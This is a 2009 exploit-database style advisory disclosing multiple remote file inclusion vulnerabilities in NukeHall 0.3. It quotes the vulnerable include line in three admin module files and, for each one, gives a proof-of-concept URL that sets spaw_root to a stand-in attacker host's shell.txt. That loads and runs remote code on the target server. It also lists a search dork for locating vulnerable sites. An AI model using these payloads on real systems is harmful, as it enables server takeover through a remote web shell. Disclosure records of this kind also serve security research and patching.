[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : NukeHall <= 0.3 Multiple Remote File Inclusion Vulnerabilities
# Published : 2009-11-24
# Author : cr4wl3r
# Previous Title : KR-Web <= 1.1b2 Remote File Inclusion Vulnerability
# Next Title : Outreach Project Tool <= 1.2.6 Remote File Inclusion Vulnerability


[ Discovered by cr4wl3r  cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#NukeHall <= 0.3 Multiple Remote File Include Vulnerability
#Download Script      :  http://sourceforge.net/project/NukeHall/files/
#Dork                 :  die("Hacking attempt");  :D
########################################################################
#
#Vuln : ./nukehall_0.3/admin/modules/blocks.php (line 28)
#       <?php
#          include $spaw_root.'spaw_control.class.php'; 
#       ?>
#PoC  :  http://server/[path]/admin/modules/blocks.php?spaw_root=http://attacker.com/shell.txt?cmd
#
#
#Vuln : ./nukehall_0.3/admin/modules/messages.php (line 28)
#       <?php
#          include $spaw_root.'spaw_control.class.php'; 
#       ?>
#PoC  :  http://server/[path]/admin/modules/messages.php?spaw_root=http://attacker.com/shell.txt?cmd
#
#
#Vuln : ./nukehall_0.3/admin/modules/stories.php (line 28)
#       <?php
#          include $spaw_root.'spaw_control.class.php'; 
#       ?>
#PoC  :  http://server/[path]/admin/modules/stories.php?spaw_root=http://attacker.com/shell.txt?cmd
#
#
#
#
########################################################################
#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,
#        dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*
########################################################################

/##############################################
#   all member at  manadocoding.net            #
#   all member at  sekuritionline.net          #
##############################################/

   [ Gorontalo / 2009 ]